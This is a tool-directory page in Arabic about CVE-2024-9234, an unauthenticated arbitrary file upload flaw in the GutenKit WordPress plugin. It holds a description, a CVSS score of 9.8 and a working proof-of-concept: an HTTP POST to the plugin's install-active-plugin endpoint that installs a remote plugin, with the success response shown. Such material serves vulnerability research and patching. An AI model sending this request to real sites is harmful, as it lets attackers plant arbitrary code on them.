Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-9234 — GutenKit <= 2.1.0 - رفع ملفات عشوائي غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-9234
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-9234

CVE-2024-9234

GutenKit <= 2.1.0 - رفع ملفات عشوائي غير مصادق عليه

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-9234

GutenKit <= 2.1.0 - رفع ملفات تعسفي بدون مصادقة

الوصف

إضافة GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor لووردبريس معرضة لرفع ملفات تعسفي بسبب عدم وجود فحص للصلاحية في الدالة install_and_activate_plugin_from_external() (نقطة نهاية REST API install-active-plugin) في جميع الإصدارات حتى 2.1.0. هذا يجعل من الممكن للمهاجمين غير المصادق عليهم تثبيت وتفعيل إضافات عشوائية، أو استخدام الوظيفة لرفع ملفات تعسفي مزيفة كإضافات.

root@kitploit:~
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon

رابط التحميل: تحميل gutenkit-blocks-addon الإصدار 2.1.0

POC

root@kitploit:~
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114

{
  "plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
  "slug": "popularis-extra"
}
root@kitploit:~
{"success":true,"data":"Plugin installed successfully!"}
تنزيل الأداة